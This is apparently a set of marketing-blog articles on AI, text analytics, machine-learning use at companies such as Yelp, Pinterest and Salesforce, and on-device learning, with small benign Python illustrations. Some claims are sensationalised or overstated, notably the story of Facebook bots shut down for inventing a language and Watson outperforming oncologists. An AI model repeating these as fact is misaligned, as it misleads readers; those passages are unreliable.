The first group includes solutions genuinely from the field of artificial intelligence, which can handle not only text analytics tasks but cognitive services in general, and combinations of them. For example, IBM Watson, officially launched in 2007, operates on big data regardless of its type and format, is capable of self-learning, and is suited to quickly finding answers to questions. The website offers a demo by subscription.

The second category includes both startups and highly targeted products from well-known corporations. For example, in the summer of 2016, ABBYY announced the launch of Findo, a search assistant for mail messages, files, and documents in the cloud; and in 2014, ABBYY launched Compreno, an intelligent search that identifies the "essence" of texts. Among non-corporate solutions on the market there are innovative companies and startups such as Textocat (which also offers smart search) and various chat-bot products. SAS has also released two key solutions for text mining and tonality analysis: SAS Text Miner and SAS Sentiment Analysis.

Among modular technologies, players such as Yandex Data Factory and EurekaEngine are active on the market. Both help companies make commercial use of accumulated data by creating end services within companies' existing business processes rather than delivering software and visualizations. YDF relies on corporate experience and machine learning technologies; EurekaEngine relies on high-speed text analytics tuned especially for the Russian-speaking space, since the company has its roots in Russia. EurekaEngine is used, incidentally, by Brand Analytics, one of the leaders in the social media and media monitoring market, which took first place for quality among social media monitoring systems in the TECH INDEX 2016 ranking by AdIndex.

Advertisers, especially DMP systems and advertising auditors, also have their own developments in the field of text analysis, but these are mainly used for internal tasks: segmentation, more precise targeting, semantic comparison of audiences (for example, audiences of mobile applications), and so on. As is well known, the devil is in the details: almost everyone struggles with the accuracy of the analysis, with the inability to separate the advertising content of a text block from the article text in the media, and with turning the results into a product.


What do clients think about the usefulness of text analytics in solving business problems? Ivan Tretyakov, managing partner of the A.R.Z.A.M.A. association and the POSonline service:

“In an era of growing consumption and rising demands on service quality, business (in particular the banking and retail segments) has begun to look more deeply at how to get closer to the client and make him more loyal. Big Data tools, analytics and, in particular, the analysis of text arrays, already show amazing results today: you can adjust your service based on people's feedback in the media, chats, and forums; you can offer people attractive promotions and discounts by studying the factors behind their demand and interest in specific product groups and brands; you can expand your list of services or lower a loan rate by studying your customers' behavior on the Internet.

Text analytics is applicable not only to businesses concentrated in the Internet space but also to offline players: for example, by analyzing user behavior and reviews of certain goods and services on the Internet and, armed with geolocation services for working with a potential audience, you can offer them interesting products, services, and solutions in the offline space, such as courses, travel, and workshops. And thanks to the availability of ready-made SaaS services for text analytics, business gets a powerful tool for growing profits and increasing the number of satisfied customers.”

Must-Have Marketing Skills to Survive in the Age of AI


10 Skills Without Which A Marketer Cannot Survive in The Age of AI

It happened. We live in the age of artificial intelligence. Hard to believe, right?

It is high time for marketers to accept this fact and begin to prepare for the inevitable changes in the technology era.

Machines are already actively learning to recognize images and speech, to predict the likelihood of certain events, and to make decisions. That is, to do our work.

Today, the most effective brands are more than twice as likely as their competitors to use AI in their marketing processes. Artificial intelligence helps companies increase sales; metrics grow thanks to the personalization of experience.

Over the past 5 years, the number of jobs requiring AI knowledge has grown by 450%.

And artificial intelligence will continue to conquer the field of marketing. Are you ready for this?

In today’s article, we’ll talk about ten skills without which a marketer cannot survive in the age of AI.

1. Flexibility
If you don’t start adapting today, you will soon fall behind your competitors. Just look at how many companies already use AI and how many plan to implement the technology in the future: AI is the fastest-growing marketing technology, expected to grow by 53% over the coming year.

If you want to succeed, you need to adapt. Do not rely too much on time-tested strategies. Feel free to experiment and test new technologies.

2. Sociability
It’s not new to marketers that developed communication skills make a significant contribution to business success. It is important to be able to convey your thoughts to employees, customers and other people with whom you have to communicate every day.

In the age of AI, communications are becoming an even more significant element of business. After all, no artificial intelligence, even the most advanced, is capable of replacing live communication.

Do not delegate 100% of client communication to robots. In the age of high technology, the human face of a brand will become a major competitive advantage.

3. Budget allocation
The introduction of artificial intelligence is not cheap. This is the main reason most brands do not yet use AI marketing solutions:

For what reason are you not interested in implementing AI solutions?

If you decide to incorporate the new technology into your strategy, you cannot do without planning and budget-allocation skills.

Try to find ways to cut costs in other areas to enter the new century before the competition.

4. The ability to analyze big data
AI will open access to huge amounts of data, and it is important to be able to analyze them.

According to research, 29% of brands use artificial intelligence to automate data analysis, and 26% use AI to analyze operational effectiveness. As a result, business owners receive large volumes of information from which they must draw conclusions and make decisions. Are you ready for that?

5. Programming Skills
To use artificial intelligence, you do not have to be a programmer. However, knowledge in this area will certainly not hurt; for example, it can save you a call to a specialist.

Basic skills will be enough to configure the collection of the data you need.

AI is often used to identify patterns. If you are comfortable with programming, it will be much easier for you to understand this area of application.

Far from all of this? You can easily find introductory material online, for example on Codecademy. Both beginner courses on programming basics and specialized data science training materials will come in handy.
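To show how little code a basic "pattern" analysis takes, here is a toy sketch relating email subject-line words to open rates. The campaign data is invented for the example; in practice you would export it from your email platform:

```python
from collections import defaultdict

# Toy pattern-finding: which subject-line words co-occur with higher
# email open rates. The campaign data below is invented for illustration.

campaigns = [
    ("free shipping this weekend", 0.31),
    ("new arrivals for spring", 0.18),
    ("free gift with every order", 0.35),
    ("spring sale ends tonight", 0.22),
]

rates_by_word = defaultdict(list)
for subject, open_rate in campaigns:
    for word in subject.split():
        rates_by_word[word].append(open_rate)

# Average open rate per word, for words seen in more than one campaign
avg = {w: sum(r) / len(r) for w, r in rates_by_word.items() if len(r) > 1}
best_word = max(avg, key=avg.get)
print(best_word, round(avg[best_word], 2))  # "free" performs best here
```

A real analysis would need far more campaigns and statistical care, but the shape of the task (group, aggregate, compare) is exactly this simple.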

6. Content creation
Content is king, right? The main goal of modern business is to create effective content both from the point of view of users and search engines. Any marketing strategy is based on the generation of content.

The competent use of artificial intelligence will allow you to make your articles, posts, videos, photos, audio, and email messages even better. For example, some brands use AI to make their Facebook ads more relevant for different user groups. And this is only one of hundreds of applications of artificial intelligence for creating and promoting content.

7. Security
Over the past few years, we have only heard about constant leaks of information in large corporations. These messages significantly damage the reputation of brands.

Do you want your customers not to worry about the safety of their personal data? Use AI with caution.

Consumers believe that artificial intelligence makes it harder for a business to stay secure online. Dispel this myth by conducting thematic campaigns, and always treat user data responsibly.

8. The spirit of competition
Marketing is a high stakes game. You constantly have to fight with other companies for users.

After the massive introduction of artificial intelligence, competition will only intensify. Without the spirit of competition, one cannot survive.

84% of marketers are confident that AI will help them outperform competitors. Find out: are your rivals already introducing the new technology?

9. Delegation and time management

The community is hotly debating whether robots will replace people in most jobs. But this does not mean that AI should be seen as a threat. Rather, it is a dream assistant for any marketer: with its help you can automate many tasks.

You no longer have to burden employees with work that a computer can easily do. They will have more time to solve creative problems.

10. Thirst for knowledge
To survive in the age of AI, it is important to be able to learn. Fortunately, today you do not even need to leave the house to do so. There are many training courses and webinars available online.

Technologies are constantly evolving, so you should closely monitor the news, expand your knowledge and listen to the opinions of experts.

Does your business need artificial intelligence to survive?

Naturally, it is not as necessary as a presence on social networks, your own website, or the ability to accept online payments. From this point of view, it will not be easy to convince yourself of the need for such a serious step. But it is important to keep a broad outlook and think about the future.

Even if you cannot afford to introduce the technology right now, you should start monitoring it closely today. After all, artificial intelligence is the future, and not just in marketing.

Cutting Edge Technologies That Will Change Marketing Industry Forever


It is difficult to imagine a field of marketing that modern technologies would not significantly change. Companies that rely on artificial intelligence, virtual reality, and voice search gain an advantage over competitors, and these technologies let them create promotions with extraordinary results.

We have listed 10 leading marketing technologies and the possibilities for their application in companies of various sizes. Which of them will you choose to transform your strategy?

10 Cutting Edge Technologies Changing Internet Marketing

1. Big data

• Improves the quality of customer data collection for fine-tuning advertising campaigns.
• Helps evaluate campaign performance.
• In the near future, big data will allow creating attribution models to assess the impact of each channel on conversion rates, customize programmatic ads and optimize video marketing.

2. Artificial Intelligence

• Finds valuable patterns for more effective targeting and prediction of consumer behavior.
• Used by search engines to analyze queries and select the appropriate content.
• Based on artificial intelligence, platforms for online chat are created that help to automatically collect customer information and solve problems on demand.
• AI-based technologies deeply analyze trends, create detailed customer profiles, and help develop successful personalization strategies for better customer focus.

3. Machine Learning (ML)

• It is used in audience segmentation and is embedded in analytics systems to track anomalies and analyze large volumes of data in real time.
• Robots have learned to create content. Banner advertising, email campaigns, and social network posts are generated in different formats for different channels. After analyzing enough data, machines can create and adjust headlines to increase efficiency.
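The segmentation bullet above can be sketched with a minimal k-means implementation. The customer data and features here are invented for illustration, and real systems use far richer feature sets and libraries.

```python
# A minimal k-means sketch of audience segmentation (synthetic data,
# deterministic initialization for reproducibility).

def kmeans(points, k, iters=10):
    """Cluster 2-D points into k groups; centroids start at the first k points."""
    centroids = [list(p) for p in points[:k]]
    assign = [0] * len(points)
    for _ in range(iters):
        # Assignment step: nearest centroid by squared distance.
        for i, (x, y) in enumerate(points):
            assign[i] = min(
                range(k),
                key=lambda c: (x - centroids[c][0]) ** 2 + (y - centroids[c][1]) ** 2,
            )
        # Update step: move each centroid to the mean of its members.
        for c in range(k):
            members = [p for i, p in enumerate(points) if assign[i] == c]
            if members:
                centroids[c] = [
                    sum(p[0] for p in members) / len(members),
                    sum(p[1] for p in members) / len(members),
                ]
    return assign, centroids

# Customers described by (visits per month, average order value).
customers = [(2, 15), (3, 18), (2, 20), (20, 90), (22, 95), (19, 88)]
labels, centers = kmeans(customers, k=2)
print(labels)  # two clear segments: occasional buyers vs. frequent big spenders
```

Once segments exist, each can receive its own messaging and budget, which is exactly the targeting use case described above.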

4. Bots

• Not only an effective tool for communication, but also a channel for round-the-clock interaction with the brand.
• Often used in sales and support, help find and recommend products.
• Soon they will be able to remind you of repeat purchases through voice assistants.
• Communication with a chatbot can occur across several devices, i.e. be omnichannel.
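As a rough sketch of the request/response loop such bots automate, here is a toy keyword-routing bot. Production chatbots rely on trained NLU models rather than hand-written rules like these, and all rules below are invented.

```python
import re

# A toy rule-based support bot: keyword routing illustrates the basic
# request/response loop that real chatbots automate with NLU models.
RULES = [
    ({"refund", "return"}, "I can help with returns. What is your order number?"),
    ({"hours", "open"}, "We are open 9:00-18:00, Monday to Saturday."),
    ({"price", "cost"}, "Could you tell me which product you are asking about?"),
]
FALLBACK = "Let me connect you with a human agent."

def reply(message: str) -> str:
    # Tokenize, ignoring punctuation, so "hours?" still matches "hours".
    words = set(re.findall(r"[a-z]+", message.lower()))
    for keywords, answer in RULES:
        if words & keywords:  # any trigger word matches
            return answer
    return FALLBACK

print(reply("What are your opening hours?"))
```

The fallback branch is the design point worth noting: a good bot hands off to a human as soon as it stops matching, which is how round-the-clock coverage and service quality coexist.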

5. Voice Search

• Marketers use voice search to collect information about device users through search queries, keywords, applications, or voice dialing.
• Soon, voice search will be integrated with SEO. Marketers need to learn how to optimize content for conversational queries.
• The technology has every chance to change the approach to advertising on the search and organic promotion of content.

6. Virtual and Augmented Reality

• Both technologies create an impressive experience that affects feelings and emotions.
• They expand the experience of product testing, brand engagement, and shopping.
• They bring offline stores and ecommerce closer, gradually blurring the line between real and virtual interaction.
• Can be used for storytelling and creating interactive brand content.

7. Internet of Things (IoT) and wearable devices

• Used to collect information about users: their habits and preferences. The more connected devices a person uses, the more opportunities marketers have to reach them with a relevant offer.
• Wearable devices transmit information on the biological state of consumers to the Internet.
• Biometric data can be used to analyze consumer interactions with the brand.

8. Blockchain

• Using blockchain technology, marketers can motivate consumers to view ads and interact with content.
• Decentralized applications based on blockchain technology can compete with Apple and Android platforms and support a new cooperative economy around the world.

9. Beacons

• Gathers detailed information about the visitor to optimize the shopping experience and helps create personalized campaigns based on movement data.
• Ecommerce companies can use localization to target potential customers within a certain radius of the sensors.
• Combines online and offline presence and provides a consistent experience.
• It helps to determine which campaigns attract attention and show only relevant ads to each client.

10. 5G

• A faster connection allows pages to load faster, reduces bounce rates, and increases CTR and ROI.
• Enhances display capabilities using VR and AR for an engaging demonstration of offers.
• Allows marketers to collect data in real time to optimize campaigns and local promotion.

These technologies significantly affect marketing and business, including:

• Data collection
• Data analysis
• Content creation
• Content distribution
• Personalization
• Targeting and placement
• Customer service

Overall, digital and Internet marketing will see a huge positive impact from the deployment of these latest technologies.

Technology is evolving and becoming more accessible. The industry is changing under its influence right now, so you need to master the promising areas in time.

Incredible Examples Of AI And Machine Learning In Practice


Artificial intelligence and machine learning are among the most significant technological developments of recent times. However, they remained underestimated in terms of practical application throughout 2019.

10 incredible examples of AI and machine learning (ML) in practice. Do you want to see how machine learning is applied in real life?

Here we have compiled 10 companies that effectively use new technologies in their strategy.


Although Yelp, a popular reviews site, doesn’t seem like a high-tech brand, it actively uses machine learning to improve its user experience.

Classifying images into facade/interior categories seems like an easy task for a person, but it is quite difficult for a computer.

Photos are no less important to Yelp than user reviews, which is why the company puts a lot of effort into working with images more efficiently.

A few years ago, the brand decided to turn to machine learning and first applied photo classification technology. Algorithms help company employees select categories for images and put down tags. The contribution of machine learning is hard to overestimate, because the brand has to analyze tens of millions of photos.
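To make the idea concrete, here is a hedged sketch of facade/interior classification using a nearest-centroid classifier over hand-made features. This is only an illustration of the principle; Yelp's actual pipeline relies on deep neural networks, and the feature values below are invented.

```python
# Sketch of facade/interior photo classification with a nearest-centroid
# classifier on toy features: (fraction of blue "sky" pixels, mean brightness).

def centroid(vectors):
    n = len(vectors)
    return tuple(sum(v[i] for v in vectors) / n for i in range(len(vectors[0])))

facade_train   = [(0.40, 0.70), (0.35, 0.65), (0.50, 0.75)]
interior_train = [(0.02, 0.45), (0.05, 0.40), (0.01, 0.55)]

centroids = {"facade": centroid(facade_train), "interior": centroid(interior_train)}

def classify(features):
    # Pick the label whose centroid is closest in squared distance.
    return min(
        centroids,
        key=lambda label: sum((f - c) ** 2 for f, c in zip(features, centroids[label])),
    )

print(classify((0.45, 0.68)))  # plenty of sky and bright -> "facade"
```

With tens of millions of photos, even an imperfect classifier like this saves enormous amounts of manual tagging; humans then only need to correct the edge cases.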


The main function of the Pinterest social network is content curation. And the company is doing everything possible to make this process more efficient, including through machine learning.

In 2015, Pinterest acquired Kosei, a company specializing in the commercial use of machine learning (in particular, content search and recommendation algorithms).

Today, machine learning is involved in every aspect of Pinterest’s business operations, from spam moderation and content search to ad monetization and reducing newsletter unsubscribes. Not bad.


Facebook Messenger is one of the most interesting products of the largest social platform in the world, because the messenger has become a kind of chatbot laboratory. When communicating with some of these bots, it is difficult to tell that you are not talking to a person.

Any developer can launch a chatbot on the Facebook Messenger platform. Thanks to this, even small companies are able to offer customers excellent service.

Of course, this is not the only machine learning application on Facebook. AI applications are used to filter spam and low-quality content; the company also develops computer vision algorithms that allow computers to “read” images.

One of the most significant changes in Twitter in recent years is the transition to a news feed based on algorithms.

Now users of social networks can sort the displayed content by popularity or by publication time.

The basis of these changes is the use of machine learning. Artificial intelligence analyzes each tweet in real time and evaluates it according to several indicators.

The Twitter algorithm primarily shows those entries that are most likely to please the user. Moreover, the choice is based on each user's personal preferences.
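A minimal sketch of this kind of ranking: score each tweet from weighted engagement features and sort the feed by score. The weights and features below are invented for illustration; the real Twitter model is far more complex and learned rather than hand-set.

```python
# Toy feed ranking: a linear relevance score over engagement features.
# Negative weight on age pushes stale posts down the timeline.
WEIGHTS = {"likes": 1.0, "retweets": 2.5, "author_affinity": 40.0, "age_hours": -1.5}

def score(tweet: dict) -> float:
    return sum(WEIGHTS[k] * tweet.get(k, 0.0) for k in WEIGHTS)

timeline = [
    {"id": "a", "likes": 120, "retweets": 10, "author_affinity": 0.1, "age_hours": 2},
    {"id": "b", "likes": 15,  "retweets": 1,  "author_affinity": 0.9, "age_hours": 1},
    {"id": "c", "likes": 300, "retweets": 50, "author_affinity": 0.0, "age_hours": 30},
]

ranked = sorted(timeline, key=score, reverse=True)
print([t["id"] for t in ranked])
```

Personalization enters through features like `author_affinity`: the same three tweets can rank differently for different users once per-user features feed the score.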


Google has impressive technological ambitions. It is difficult to imagine a field of scientific research to which this corporation (or its parent company Alphabet) has not contributed.

For example, in recent years, Google has been developing aging technologies, medical devices, and neural networks.

One of the company's most striking achievements is DeepMind's machines that can "dream" and create unusual images.

Google is committed to exploring all aspects of machine learning, which helps the company improve classical algorithms, as well as more efficiently process and translate natural speech, improve ranking and predictive systems.


For a long time, retailers have been trying to combine shopping in online and offline stores. But only a few really succeed.

Edgecase uses machine learning to enhance the customer experience. At the same time, the brand seeks not only to increase conversion rates but also to help those customers who have only a vague idea of what they want.

By analyzing the behavior and actions of users that indicate their intention to make a purchase, the brand makes online search more useful and brings it closer to the experience of shopping in a traditional store.


Google is not the only search giant that masters machine learning. Chinese search engine Baidu is also actively investing in the development of AI.

One of the most interesting developments of the company is Deep Voice, a neural network capable of generating synthetic human voices that are almost impossible to distinguish from real ones. The system can imitate features of intonation, pronunciation, stress and pitch.

The latest Baidu invention, Deep Voice 2, will significantly affect the efficiency of natural language processing, voice search, and speech recognition systems. The new technology can also be applied in other areas, for example, interpretation and biometric security systems.


HubSpot has long been known for its interest in technology. The company recently acquired Kemvi, a brand specializing in machine learning.

HubSpot plans to use Kemvi's technology for several purposes; the most significant is the integration of its DeepGraph machine learning and natural language processing engine with HubSpot's internal content management system.

This will allow the company to more effectively define “triggers” - changes in the structure and management of the company that affect day-to-day operations. With this innovation, HubSpot will be able to more effectively attract customers and provide a high level of service.


The technology giant IBM is abandoning its outdated business model and actively exploring new directions. The brand’s most famous product today is the Watson artificial intelligence.

Over the past few years, Watson has been used in hospitals and medical centers where it has diagnosed certain types of cancer more effectively than oncologists.

Watson also has tremendous potential in retail, where it can serve as a shopping consultant. IBM offers the product on a license basis, which makes it distinctive and more affordable.


Salesforce is a titan of the technology world with a significant share of the customer relationship management (CRM) market.

Predictive analytics and lead scoring are among the main challenges for today's online marketers, which is why Salesforce is betting heavily on its Einstein machine learning technology.

Einstein allows companies that use Salesforce CRM to analyze every aspect of the customer relationship, from first contact to each subsequent touchpoint. This lets them build more detailed profiles and identify the most important points in the sales process, which leads to more effective lead scoring, a better customer experience, and expanded opportunities.

The future of machine learning
Some of the forms of machine learning listed above would have seemed like fiction ten years ago. And each new discovery continues to amaze today.

What AI and machine learning trends await us in the near future, in 2020?

Very soon, artificial intelligence will be able to learn much more efficiently: machines will improve with minimal human involvement.

The rise of cybercrime is forcing companies to think about defenses. Soon, AI will play an increasingly important role in monitoring, preventing and responding to cyber attacks.

Generative models such as the ones Baidu uses in the example above are pretty convincing today. But soon we will not be able to distinguish machines from people at all. In the future, algorithms will be able to create pictures, imitate human speech, and even entire personalities.

Even the most complex artificial intelligence needs a huge amount of data for training. Soon, machine learning systems will require less and less information and time.

For a long time, people have been wondering if artificial intelligence can be dangerous to humans.

In June of this year, experts from Facebook’s artificial intelligence research team (FAIR) decided to shut down one of the systems they created after its bots began to communicate in their own language, which was incomprehensible to humans. Experts are calling for regulation of this area of technology in order to avoid the threat of artificial intelligence getting out of control.

In the future, this may lead to restrictions and even a slowdown in the development of this area. In any case, it is important to use new technologies for the benefit of mankind, not to its detriment. And this requires strict regulation of the industry.

DID YOU KNOW: Over 50% of advertisers will use AI in 2020

This conclusion was reached by the authors of the “AI in marketing” study from the Segmento advertising platform, who interviewed representatives of the 300 largest advertisers. 20% of companies said they already use artificial intelligence for marketing purposes, and another 32% will join them next year. The remaining 48% of companies do not use the technology: they lack the competencies to make a positive decision (33%), find it difficult to hire experienced AI specialists (27%), or have not yet assessed the possibility of using the technology (18%).

The most popular AI-based tools are programmatic purchase of media advertising and retargeting, i.e. returning a visitor to the advertiser's website (48% each); chatbots and big-data analysis for management decisions (38% each); and personalization of a website or mobile application (29%). Almost a quarter of companies use AI to predict customer satisfaction. The technology is least used to offer consumers individual prices for goods and services (5%). Companies also use AI to automate call centers and improve the quality of goods and services.

As a rule, advertisers turn to advertising agencies (47%) and AI-specializing companies (33%) to integrate relevant solutions into the marketing practices of their companies.

“In the case of artificial intelligence, it can be stated that so far the technology solves narrow, specific applied problems, and their range is very limited. For a more substantial and comprehensive integration of AI, companies will have to conduct a global audit of their business processes.”

The Present And Future of Machine Learning on Devices


Where we stand at the moment, and what the future of machine learning on devices will be in 2020

On-device machine learning is developing rapidly. Apple mentioned it about a hundred times during WWDC 2019, so it's no wonder developers want to add machine learning to their applications.
However, many of these models are used only to draw inferences from a fixed set of knowledge. Despite the term “machine learning”, no learning takes place on the device; the knowledge is baked into the model and does not improve over time.

Face detection technology is available in smartphones now.

The reason for this is that model training requires a lot of computing power, and mobile phones are not yet capable of it. It is much easier to train models offline on a server farm and ship all model improvements in an application update.
It is worth noting that on-device training does make sense for some applications, and we believe that over time such training will become as familiar as using models for inference. In this context, we want to explore the possibilities of this technology.

Machine Learning Today

The most common applications of deep learning and machine learning are:
• Search engines like Google, Bing, Yandex, etc.
• Virtual personal assistants like Amazon Alexa, Apple's Siri, Google Now, and Microsoft's Cortana
• Applications too complex to program by hand
• Self-driving cars
• Database mining for the growth of automation
• Dynamic pricing
• Spam detectors
• Google Translate
• Photo-tagging applications
• Online video streaming
• Fraud detection

A modern phone has many different sensors and a fast Internet connection, which means a lot of data is available for models. iOS uses several on-device deep learning models: face recognition in photos, the "Hey Siri" phrase, and handwritten Chinese characters. But none of these models learns anything from the user. Almost all machine learning APIs (MPSCNN, TensorFlow Lite, Caffe2) can make predictions based on user data, but you cannot make these models learn anything new from that data.

Today, training takes place on servers with a large number of GPUs. It is a slow process requiring a lot of data. A convolutional neural network, for example, is trained on thousands or millions of images. Training such a network from scratch takes several days on a powerful server, several weeks on a desktop computer, and ages on a mobile device.

Training on the server is a good strategy if the model is updated irregularly and every user uses the same model. The application receives a model update each time it is updated in the App Store, or when new parameters are periodically downloaded from the cloud.
Today, training large models on the device is impossible, but it will not always be so. And these models do not have to be large. Most importantly: one model for everyone may not be the best solution.

Why do I need training on the device?

There are several benefits of learning on the device:

•An application can learn from data or user behavior.
•Data will remain on the device.
•Transferring any process to a device saves money.
•The model will be trained and updated continuously.

This solution is not suitable for every situation, but there are some applications for it. I think that its main advantage is the ability to fit the model to a specific user.

On iOS devices, some applications already do this:

•The keyboard learns from the texts you type and makes suggestions for the next word in the sentence. This model is trained specifically for you, not for other users. Since training takes place on the device, your messages are not sent to a cloud server.

•The Photos app automatically organizes images into the People album. I'm not quite sure how this works, but the program uses the face recognition API and groups similar faces together. Perhaps this is just unsupervised clustering, but some training must still happen, since the application lets you correct its errors and improves based on your feedback. Regardless of the type of algorithm, this application is a good example of customizing the user experience based on user data.

•Touch ID and Face ID learn based on your fingerprint or face. Face ID continues to learn over time, so if you grow a beard or start wearing glasses, it will still recognize your face.

•Motion detection. The Apple Watch learns your habits, such as how your heart rate changes during various activities. Again, I do not know exactly how this works, but obviously some training must take place.

•The Clarifai Mobile SDK allows users to create their own image classification models using photographs of objects and their labels. Typically, a classification model requires thousands of images for training, but this SDK can learn from just a few examples. The ability to create image classifiers from your own photos without being a machine learning expert has many practical uses.
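The keyboard example above is the simplest to sketch: a bigram table updated from the user's own typing, so the "model" personalizes itself without any data leaving the process. Real keyboards use neural models, and the sample sentences are invented, but the personalization principle is the same.

```python
from collections import Counter, defaultdict

# bigrams[prev_word] counts which words this user actually types next.
bigrams = defaultdict(Counter)

def learn(text: str) -> None:
    words = text.lower().split()
    for prev, nxt in zip(words, words[1:]):
        bigrams[prev][nxt] += 1

def suggest(prev_word: str):
    counts = bigrams[prev_word.lower()]
    return counts.most_common(1)[0][0] if counts else None

# The model adapts to whatever this particular user types; nothing is uploaded.
learn("see you at the office")
learn("meet me at the office")
learn("at the gym tomorrow")

print(suggest("the"))  # "office" seen twice after "the", "gym" only once
```

Each `learn` call is cheap enough to run after every sentence, which is why this kind of model can train in real time on the device.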

Some of these tasks are easier than others. Often “learning” is simply remembering the last action of the user. For many applications, this is sufficient, and it does not require fancy machine learning algorithms.

The keyboard model is quite simple, and training can take place in real time. The Photos application learns more slowly and consumes a lot of energy, so training occurs while the device is charging. Many practical applications of on-device learning fall between these two extremes.
Other existing examples include spam detection (your email client learns from the emails you mark as spam), text correction (it examines your most common typing errors and corrects them), and smart calendars like Google Now that learn to recognize your regular activities.
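The spam-detection example can be sketched as a tiny naive Bayes filter that keeps learning from the user's own "mark as spam" actions. The training messages are invented for illustration; a real client would use far more data and features.

```python
import math
from collections import Counter

class SpamFilter:
    """Naive Bayes with Laplace smoothing, updated from user labels."""
    def __init__(self):
        self.words = {"spam": Counter(), "ham": Counter()}
        self.counts = {"spam": 0, "ham": 0}

    def train(self, text, label):
        # Called every time the user marks a message as spam (or not).
        self.counts[label] += 1
        self.words[label].update(text.lower().split())

    def predict(self, text):
        vocab = set(self.words["spam"]) | set(self.words["ham"])
        best, best_score = None, -math.inf
        for label in ("spam", "ham"):
            total = sum(self.words[label].values())
            # Log prior + smoothed log likelihood of each word.
            score = math.log(self.counts[label] / sum(self.counts.values()))
            for w in text.lower().split():
                score += math.log((self.words[label][w] + 1) / (total + len(vocab)))
            if score > best_score:
                best, best_score = label, score
        return best

f = SpamFilter()
f.train("win a free prize now", "spam")
f.train("free money click now", "spam")
f.train("lunch meeting tomorrow", "ham")
f.train("see you at the meeting", "ham")
print(f.predict("free prize click"))
```

Because each `train` call only updates counters, the filter improves continuously on the device without ever shipping the mail contents to a server.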

How Far Can We Go?

If the purpose of on-device learning is to adapt a machine learning model to the needs or behavior of specific users, what can we do with it?
Here's a fun example: a neural network that turns drawings into emoji. It asks you to draw several different shapes and trains the model to recognize them. This application is implemented on Swift Playgrounds, not the fastest platform, but even under such conditions the neural network does not take long to train: only a few seconds on the device (this is how the model works).

If your model is also not very complex, like this two-layer neural network, you can already conduct training on the device.
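A network of roughly that scale can be trained in well under a second even in plain Python with NumPy. The toy "drawing" data below is invented (4-pixel images, label 1 when the left half is darker than the right); the point is only that small two-layer models train fast.

```python
import numpy as np

rng = np.random.default_rng(0)

# 200 tiny 4-pixel "drawings" and a simple learnable rule as labels.
X = rng.random((200, 4))
y = ((X[:, 0] + X[:, 1]) > (X[:, 2] + X[:, 3])).astype(float).reshape(-1, 1)

# Two-layer network: 4 -> 8 (tanh) -> 1 (sigmoid).
W1 = rng.normal(0, 0.5, (4, 8)); b1 = np.zeros(8)
W2 = rng.normal(0, 0.5, (8, 1)); b2 = np.zeros(1)
sigmoid = lambda z: 1.0 / (1.0 + np.exp(-z))

def loss():
    h = np.tanh(X @ W1 + b1)
    p = sigmoid(h @ W2 + b2)
    return float(np.mean((p - y) ** 2))

initial = loss()
lr = 0.5
for _ in range(500):  # plain batch gradient descent with manual backprop
    h = np.tanh(X @ W1 + b1)
    p = sigmoid(h @ W2 + b2)
    grad_p = 2 * (p - y) / len(X) * p * (1 - p)      # grad at output pre-activation
    grad_h = (grad_p @ W2.T) * (1 - h ** 2)          # grad at hidden pre-activation
    W2 -= lr * h.T @ grad_p;  b2 -= lr * grad_p.sum(0)
    W1 -= lr * X.T @ grad_h;  b1 -= lr * grad_h.sum(0)

print(f"MSE: {initial:.3f} -> {loss():.3f}")  # the loss drops quickly
```

Five hundred full-batch steps over 200 samples is a few hundred thousand multiply-adds, which is trivial even for a phone; this is why shape-recognition demos can train interactively.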

Note: on the iPhone X, developers have access to a low-resolution 3D model of the user's face. You can use this data to train a model that selects emoji or other actions in an application based on the user's facial expressions.

Here are a few other future features:

• Smart Reply is a model from Google that analyzes an incoming message or email and suggests a suitable reply. It has not yet been trained on the device and recommends the same answers to all users, but (in theory) it could be trained on the user's own texts, which would significantly improve the model.

• Handwriting recognition that learns from your own handwriting. This is especially useful on the iPad Pro with the Pencil. This is not a new feature, but if your handwriting is as bad as mine, the standard model will make too many mistakes.

• Speech recognition that becomes more accurate and tailored to your voice.

• Sleep tracking and fitness apps. Before these apps can give you tips on improving your health, they need to get to know you. For privacy reasons, this data is best kept on the device.

• Personalized models for dialogue. We have yet to see the future of chatbots, but their advantage is that a bot can adapt to you. When you talk with a chatbot, your device will study your speech and preferences and adjust the chatbot's answers to your personality and manner of communication (for example, Siri could learn to make fewer comments).

• Improved advertising. No one likes advertising, but machine learning can make it less annoying for users and more profitable for advertisers. For example, an ad SDK could learn how often you view and click on ads and find the most appropriate ones for you. An application could train a local model that requests only the ads that work for a specific user.

• Recommendations are a common use of machine learning. A podcast player can learn from the programs you have listened to in order to give advice. Today applications perform this operation in the cloud, but it could be done on the device.

• Applications for people with disabilities can help them navigate and better understand their surroundings. I am not an expert here, but I can imagine such applications helping, for example, to distinguish between different drugs using the camera.

These are just a few ideas. Since all people are different, machine learning models could adapt to our specific needs and desires. Training on the device allows you to create a unique model for a unique user.

Different scenarios of model training
Before applying a model, you need to train it. Training then needs to continue in order to improve the model.

There are several training options:

• No training on user data. You collect your own data or use publicly available data to create a single model. When the model improves, you release an application update or simply upload new parameters to it. Most existing machine learning applications do this.

• Centralized training. If your application or service already requires user data that is stored on your servers, and you have access to it, then you can train on this data on your server. The data can be used to train a model for a specific user or for all users. This is what platforms like Facebook do. This option raises questions of privacy, security, scalability, and many others. The privacy issue can be addressed with Apple's differential privacy method, but it also has its consequences.

• Collaborative learning. This method transfers the cost of training to the users themselves. Training takes place on the device, and each user trains a small part of the model. Model updates are sent to other users, so that they can learn from your data and you from theirs. But it is still a single model, and everyone ends up with the same parameters. The main advantage of such training is its decentralization (essentially what is now called federated learning). In theory this is better for privacy, but according to research it may actually be worse.

• Each user trains their own model. This is the option I am personally most interested in. The model can learn from scratch (as in the drawings-to-emoji example) or it can be a pretrained model that is fine-tuned on your data. In either case, the model can be improved over time. For example, a keyboard starts with a model already trained on a particular language, but over time learns to predict what you want to write. The downside of this approach is that other users cannot benefit from it, so it only works for applications that use unique data.

How to carry out training on the device?

It is worth remembering that training on user data is different from training on a large generic dataset. An initial keyboard model can be trained on a standard corpus of text (for example, all of Wikipedia), but a text message or email is written in a language that differs from a typical Wikipedia article, and that style differs from user to user. The model must account for these kinds of variation.
Another problem is that our best deep learning methods are quite inefficient and crude. As I said, training an image classifier can take days or weeks. The training process, stochastic gradient descent, proceeds in small steps. A data set can contain a million images, each of which the neural network will see about a hundred times.

Obviously, this method is not suitable for mobile devices. But often you do not need to train a model from scratch. Many people take an already trained model and apply transfer learning on their own data. But these smaller data sets still consist of thousands of images, so even transfer learning is too slow.

